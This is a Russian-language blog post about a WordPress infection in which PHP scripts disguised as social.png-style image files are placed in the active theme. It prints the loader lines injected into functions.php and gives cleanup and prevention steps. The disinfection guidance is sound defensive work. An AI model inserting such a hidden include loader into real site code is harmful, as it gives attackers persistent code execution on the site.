Вирус social0.png

Название вируса в заголовке произвольное. Надо же было его как-то идентифицировать. Проблема замечена на сайтах работающих на WordPress.

Симптомы:

  • долго открываются страницы на сайте
  • выпадает белая страница при активации/деактивации плагинов, сохранении записей/страниц
  • белая страница может выпадать при открытии записи для редактирования

Осмотр сайта-пациента

При осмотре файлов и папок сайта было обнаружено это:

а) в корне активной темы (шаблона) обнаружено несколько файлов:
social.png, social0.png, social1.png (может быть больше).

На самом деле это не графические файлы, а php-скрипты (расширение .png добавили чтобы замаскировать их и не вызвать подозрение).
Беглый просмотр кода показывает, что идет обмен данным между серверами (жертвой и хакером).

б) добавлена новая функция в файл темы functions.php (всегда в конце файла):

<?php 
if (!defined('WP_OPTION_KEY')) {
include_once 'social.png';
}

if (!defined('WP_OPTION_KEY')) {
include_once 'social0.png';
}

Эта функция подключает скрипты для их выполнения на вашем сайте.

Замечено, что заражаются все сайты на одном аккаунте на хостинге. Вирус проникает и действует в активной теме (шаблоне).

Лечение

1. На всех сайтах (которые привязаны к одному аккаунту на хостинге) необходимо:
а) Удалить в активной теме все файлы social.png, social0.png, social1.png и т.д.
б) в каждом файле functions.php убрать чужую функцию.

2. Поменять пароли к фтп, админке сайта и к базе данных.

3. Удалить на сайтах все темы взятые из паблика (а не из официального источника).

Профилактика

Главное правило: не используйте темы и плагины из паблика. Это один из основных источников заражения вашего сайта.

Подписаться
Уведомить о
guest

0 комментариев
Старые
Новые Популярные
Межтекстовые Отзывы
Посмотреть все комментарии